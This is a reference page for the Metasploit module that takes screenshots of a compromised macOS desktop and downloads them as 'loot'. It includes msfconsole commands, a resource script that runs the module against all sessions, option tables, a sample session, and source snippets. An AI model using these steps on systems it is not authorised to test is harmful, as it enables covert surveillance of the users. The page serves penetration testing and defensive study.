OSX Screen Capture - Metasploit


This page contains detailed information about how to use the post/osx/capture/screen metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: OSX Screen Capture
Module: post/osx/capture/screen
Source code: modules/post/osx/capture/screen.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module takes screenshots of target desktop and automatically downloads them.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/osx/capture/screen

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/osx/capture/screen
msf post(screen) > show options
    ... show and set options ...
msf post(screen) > set SESSION session-id
msf post(screen) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/osx/capture/screen")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

This module takes screenshots of target desktop and automatically downloads them.

Verification Steps

  1. Start msfconsole
  2. Get a shell, user level is fine
  3. Do: use post/osx/capture/screen
  4. Do: set session #
  5. Do: run
  6. You should have a screenshot saved to loot

Options

COUNT The number of screenshots to collect. Default is 1.

DELAY Interval between screenshots in seconds. 0 for no delay. Default is 10.

EXE_PATH Path to remote screencapture executable. Default is /usr/sbin/screencapture

FILETYPE File format to use when saving a snapshot (Accepted: png, gif). Default is png.

TMP_PATH Path to remote temp directory. Default is /tmp/<random>

Scenarios

User level shell on OSX 10.14.4

msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen 
msf5 post(osx/capture/screen) > set session 1
session => 1
msf5 post(osx/capture/screen) > run

[*] Capturing 1 screenshots with a delay of 10 seconds
[*] Screen Capturing Complete
[*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot
[*] Post module execution completed
msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot

Loot
====

host           service  type                       name              content     info        path
----           -------  ----                       ----              -------     ----        ----
222.222.2.222           screen_capture.screenshot  screenshot.0.png  image/png   Screenshot  /loot/20190414205923_default_222.222.2.222_screen_capture.s_194117.png

Go back to menu.

Msfconsole Usage

Here is how the osx/capture/screen post exploitation module looks in the msfconsole:

msf6 > use post/osx/capture/screen

msf6 post(osx/capture/screen) > show info

       Name: OSX Screen Capture
     Module: post/osx/capture/screen
   Platform: OSX
       Arch: 
       Rank: Normal

Provided by:
  Peter Toth <[email protected]>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name      Current Setting          Required  Description
  ----      ---------------          --------  -----------
  COUNT     1                        yes       Number of screenshots to collect.
  DELAY     10                       yes       Interval between screenshots in seconds. 0 for no delay
  EXE_PATH  /usr/sbin/screencapture  yes       Path to remote screencapture executable
  FILETYPE  png                      yes       File format to use when saving a snapshot (Accepted: png, gif)
  SESSION                            yes       The session to run this module on.
  TMP_PATH  /tmp/<random>            yes       Path to remote temp directory

Description:
  This module takes screenshots of target desktop and automatically 
  downloads them.

Module Options

This is a complete list of options available in the osx/capture/screen post exploitation module:

msf6 post(osx/capture/screen) > show options

Module options (post/osx/capture/screen):

   Name      Current Setting          Required  Description
   ----      ---------------          --------  -----------
   COUNT     1                        yes       Number of screenshots to collect.
   DELAY     10                       yes       Interval between screenshots in seconds. 0 for no delay
   EXE_PATH  /usr/sbin/screencapture  yes       Path to remote screencapture executable
   FILETYPE  png                      yes       File format to use when saving a snapshot (Accepted: png, gif)
   SESSION                            yes       The session to run this module on.
   TMP_PATH  /tmp/<random>            yes       Path to remote temp directory

Advanced Options

Here is a complete list of advanced options supported by the osx/capture/screen post exploitation module:

msf6 post(osx/capture/screen) > show advanced

Module advanced options (post/osx/capture/screen):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the osx/capture/screen module can do:

msf6 post(osx/capture/screen) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the osx/capture/screen post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(osx/capture/screen) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Aborting, screencapture binary not found.

Here is a relevant code snippet related to the "Aborting, screencapture binary not found." error message:

49:	    else
50:	      delay = datastore['DELAY']
51:	    end
52:	
53:	    if not file?(exe_path)
54:	      print_error("Aborting, screencapture binary not found.")
55:	      return
56:	    end
57:	
58:	    print_status "Capturing #{count} screenshots with a delay of #{delay} seconds"
59:	    # calculate a sane number of leading zeros to use.  log of x  is ~ the number of digits

Error taking the screenshot

Here is a relevant code snippet related to the "Error taking the screenshot" error message:

70:	        file = "#{tmp_path}/#{filename}"
71:	        cmd_exec("#{exe_path} -x -C -t #{file_type} #{file}")
72:	        data = read_file(file)
73:	        file_rm(file)
74:	      rescue ::Rex::Post::Meterpreter::RequestError => e
75:	        print_error("Error taking the screenshot")
76:	        vprint_error("#{e.class} #{e} #{e.backtrace}")
77:	        return
78:	      end
79:	
80:	      unless data

No data for screenshot <NUM>

Here is a relevant code snippet related to the "No data for screenshot <NUM>" error message:

76:	        vprint_error("#{e.class} #{e} #{e.backtrace}")
77:	        return
78:	      end
79:	
80:	      unless data
81:	        print_error("No data for screenshot #{num}")
82:	        next
83:	      end
84:	
85:	      begin
86:	        # let's loot it using non-clobbering filename, even tho this is the source filename, not dest

Error storing screenshot

Here is a relevant code snippet related to the "Error storing screenshot" error message:

87:	        fn = "screenshot.%0#{leading_zeros}d.#{file_type}" % num
88:	        location = store_loot("screen_capture.screenshot", "image/#{file_type}", session, data, fn, "Screenshot")
89:	        vprint_good("Screenshot #{num} saved on #{location}")
90:	        file_locations << location
91:	      rescue ::IOError, ::Errno::ENOENT => e
92:	        print_error("Error storing screenshot")
93:	        vprint_error("#{e.class} #{e} #{e.backtrace}")
94:	        return
95:	      end
96:	
97:	    end

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

  • Peter Toth <globetother[at]gmail.com>

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.